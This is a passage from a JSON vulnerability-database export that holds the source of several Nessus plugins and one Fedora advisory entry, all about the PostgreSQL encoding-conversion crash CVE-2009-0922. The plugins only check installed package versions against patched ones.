Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-7.4.25-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-contrib-7.4.25-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-devel-7.4.25-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-docs-7.4.25-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-libs-7.4.25-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-server-7.4.25-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"postgresql-libs-32bit-9-200903241522\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:03:39", "description": "Remote authenticated users could crash the postgresql server by\nrequesting a conversion with an inappropriate encoding\n(CVE-2009-0922).", "edition": 23, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : postgresql (postgresql-675)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0922"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:postgresql-libs-32bit", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:postgresql-devel", "p-cpe:/a:novell:opensuse:postgresql-libs", "p-cpe:/a:novell:opensuse:postgresql", "p-cpe:/a:novell:opensuse:postgresql-server", "p-cpe:/a:novell:opensuse:postgresql-contrib"], "id": "SUSE_11_0_POSTGRESQL-090324.NASL", "href": "https://www.tenable.com/plugins/nessus/40113", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postgresql-675.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40113);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0922\");\n\n script_name(english:\"openSUSE Security Update : postgresql (postgresql-675)\");\n script_summary(english:\"Check for the postgresql-675 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Remote authenticated users could crash the postgresql server by\nrequesting a conversion with an inappropriate encoding\n(CVE-2009-0922).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=486347\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postgresql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-8.3.7-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-contrib-8.3.7-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-devel-8.3.7-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-libs-8.3.7-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-server-8.3.7-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.3.7-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql / postgresql-contrib / postgresql-devel / etc\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:46:59", "description": "Remote authenticated users could crash the postgresql server by\nrequesting a conversion with an inappropriate encoding.\n(CVE-2009-0922)", "edition": 23, "published": "2009-09-24T00:00:00", "title": "SuSE 10 Security Update : PostgreSQL (ZYPP Patch Number 6114)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0922"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_POSTGRESQL-6114.NASL", "href": "https://www.tenable.com/plugins/nessus/41579", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41579);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0922\");\n\n script_name(english:\"SuSE 10 Security Update : PostgreSQL (ZYPP Patch Number 6114)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Remote authenticated users could crash the postgresql server by\nrequesting a conversion with an inappropriate encoding.\n(CVE-2009-0922)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0922.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6114.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"postgresql-devel-8.1.17-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"postgresql-libs-8.1.17-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.1.17-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-8.1.17-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-contrib-8.1.17-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-devel-8.1.17-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-docs-8.1.17-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-libs-8.1.17-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-server-8.1.17-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.1.17-0.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:07:10", "description": "Update to PostgreSQL 8.3.7, for various fixes described at\nhttp://www.postgresql.org/docs/8.3/static/release-8-3-7.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-03-24T00:00:00", "title": "Fedora 9 : postgresql-8.3.7-1.fc9 (2009-2927)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0922"], "modified": "2009-03-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:postgresql", "cpe:/o:fedoraproject:fedora:9"], "id": "FEDORA_2009-2927.NASL", "href": "https://www.tenable.com/plugins/nessus/35995", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-2927.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35995);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-0922\");\n script_bugtraq_id(34090);\n script_xref(name:\"FEDORA\", value:\"2009-2927\");\n\n script_name(english:\"Fedora 9 : postgresql-8.3.7-1.fc9 (2009-2927)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to PostgreSQL 8.3.7, for various fixes described at\nhttp://www.postgresql.org/docs/8.3/static/release-8-3-7.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.postgresql.org/docs/8.3/static/release-8-3-7.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/docs/8.3/release-8-3-7.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=488156\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-March/021603.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?617699ea\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postgresql package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"postgresql-8.3.7-1.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:46:59", "description": "Remote authenticated users could crash the postgresql server by\nrequesting a conversion with an inappropriate encoding\n(CVE-2009-0922).", "edition": 23, "published": "2009-04-16T00:00:00", "title": "openSUSE 10 Security Update : postgresql (postgresql-6115)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0922"], "modified": "2009-04-16T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:postgresql-libs-32bit", "p-cpe:/a:novell:opensuse:postgresql-devel", "p-cpe:/a:novell:opensuse:postgresql-libs", "p-cpe:/a:novell:opensuse:postgresql", "p-cpe:/a:novell:opensuse:postgresql-server", "p-cpe:/a:novell:opensuse:postgresql-contrib"], "id": "SUSE_POSTGRESQL-6115.NASL", "href": "https://www.tenable.com/plugins/nessus/36169", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postgresql-6115.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36169);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0922\");\n\n script_name(english:\"openSUSE 10 Security Update : postgresql (postgresql-6115)\");\n script_summary(english:\"Check for the postgresql-6115 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Remote authenticated users could crash the postgresql server by\nrequesting a conversion with an inappropriate encoding\n(CVE-2009-0922).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postgresql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postgresql-8.2.13-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postgresql-contrib-8.2.13-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postgresql-devel-8.2.13-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postgresql-libs-8.2.13-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postgresql-server-8.2.13-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.2.13-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql / postgresql-contrib / postgresql-devel / etc\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:13:50", "description": "Remote authenticated users could crash the postgresql server by\nrequesting a conversion with an inappropriate encoding.\n(CVE-2009-0922)", "edition": 23, "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : PostgreSQL (SAT Patch Number 674)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0922"], "modified": "2009-09-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:postgresql-contrib", "p-cpe:/a:novell:suse_linux:11:postgresql-server", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:postgresql-docs", "p-cpe:/a:novell:suse_linux:11:postgresql-libs-32bit", "p-cpe:/a:novell:suse_linux:11:postgresql", "p-cpe:/a:novell:suse_linux:11:postgresql-libs"], "id": "SUSE_11_POSTGRESQL-090324.NASL", "href": "https://www.tenable.com/plugins/nessus/41450", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41450);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0922\");\n\n script_name(english:\"SuSE 11 Security Update : PostgreSQL (SAT Patch Number 674)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Remote authenticated users could crash the postgresql server by\nrequesting a conversion with an inappropriate encoding.\n(CVE-2009-0922)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=486347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0922.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 674.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"postgresql-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"postgresql-libs-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"postgresql-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"postgresql-contrib-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"postgresql-docs-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"postgresql-libs-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"postgresql-server-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-libs-32bit-8.3.7-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.3.7-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6600"], "description": "PostgreSQL is an advanced Object-Relational database management system (DBMS) that supports almost all SQL constructs (including transactions, subselects and user-defined types and functions). The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DBMS server. These PostgreSQL client programs are programs that directly manipulate the internal structure of PostgreSQL databases on a PostgreSQL server. These client programs can be located on the same machine with the PostgreSQL server, or may be on a remote machine which accesses a PostgreSQL server over a network connection. This package contains the docs in HTML for the whole package, as well as command-line utilities for managing PostgreSQL databases on a PostgreSQL server. If you want to manipulate a PostgreSQL database on a remote PostgreSQL server, you need this package. You also need to install this package if you're installing the postgresql-server package. ", "modified": "2009-09-11T23:21:13", "published": "2009-09-11T23:21:13", "id": "FEDORA:8EFE610F87A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: postgresql-8.3.8-1.fc11", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, 